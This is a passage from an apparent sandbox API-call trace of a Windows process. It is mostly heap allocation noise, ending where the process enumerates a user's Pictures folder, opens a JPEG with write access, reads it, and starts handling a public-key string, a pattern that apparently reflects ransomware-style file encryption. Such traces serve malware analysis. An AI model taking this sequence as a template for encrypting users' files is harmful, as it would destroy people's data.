hHeap=0x2c0000) returned 1 [0189.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0189.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0189.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.966] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.966] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0189.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.967] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.967] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0189.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0189.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0189.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0189.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0189.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0189.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0189.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0189.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0189.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.984] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.984] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0189.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0189.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0189.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0189.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0189.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0189.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.995] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.995] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.995] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.995] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.996] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.996] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.997] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.997] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.997] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\") returned="Pictures\\" [0189.997] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0189.997] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0189.997] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.997] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0189.997] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0189.997] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.997] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0189.998] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.998] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0189.998] PathFindFileNameW (pszPath="") returned="" [0189.998] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.998] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\*" (normalized: "c:\\users\\keecfmwgj\\pictures\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x995cf350, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x995cf350, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0189.998] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.999] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x995cf350, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x995cf350, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0189.999] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x418ef930, ftCreationTime.dwHighDateTime=0x1d8a35b, ftLastAccessTime.dwLowDateTime=0x7c0d2a90, ftLastAccessTime.dwHighDateTime=0x1d8a456, ftLastWriteTime.dwLowDateTime=0x7c0d2a90, ftLastWriteTime.dwHighDateTime=0x1d8a456, nFileSizeHigh=0x0, nFileSizeLow=0x2c53, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-ctDCbmthLRz.jpg", cAlternateFileName="-CTDCB~1.JPG")) returned 1 [0189.999] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0189.999] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0189.999] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0189.999] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\-ctDCbmthLRz.jpg") returned=".jpg" [0189.999] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\-ctDCbmthLRz.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\-ctdcbmthlrz.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0190.001] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=11347) returned 1 [0190.001] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0190.004] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x2c2d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.004] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0190.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.006] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.006] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x2c53, lpOverlapped=0x0) returned 1 [0190.007] lstrlenA (lpString="-----BEGIN PUBLIC 